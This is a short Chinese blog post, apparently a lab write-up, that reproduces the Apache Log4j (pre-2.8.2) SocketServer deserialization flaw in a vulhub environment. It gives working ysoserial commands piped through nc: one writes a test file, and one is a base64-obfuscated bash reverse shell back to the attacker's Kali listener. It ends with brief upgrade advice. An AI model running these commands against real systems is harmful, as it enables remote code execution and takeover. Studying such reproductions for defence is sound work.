🗒️log4j 反序列化漏洞
2022-8-7
| 2023-10-29
字数 188阅读时长 1 分钟
type
status
date
slug
summary
tags
category
icon
password

Apache Log4j Server

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地

影响版本和危害

Apache Log4j 2.8.2之前的2.x版本,攻击者可利用该漏洞执行任意代码。

漏洞复现

1. 写入文件

使用ysoserial生成payload,然后直接发送给 目标机ip:4712 即可。
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/testsuccess" | nc 192.168.110.132 4712
notion image
进入vulhub环境查看
notion image
文件生成成功

2.反弹shell

kali(192.168.110.131)机开启监听nc -lvvp 4444
在线网站生成反弹shell:
notion image
执行命令后监听成功
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xMzEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.110.132 4712

漏洞修复

更新到最新版本
notion image
 
  • 漏洞复现
  • log4j2 JNDI注入漏洞shiro认证绕过漏洞复现
    Loading...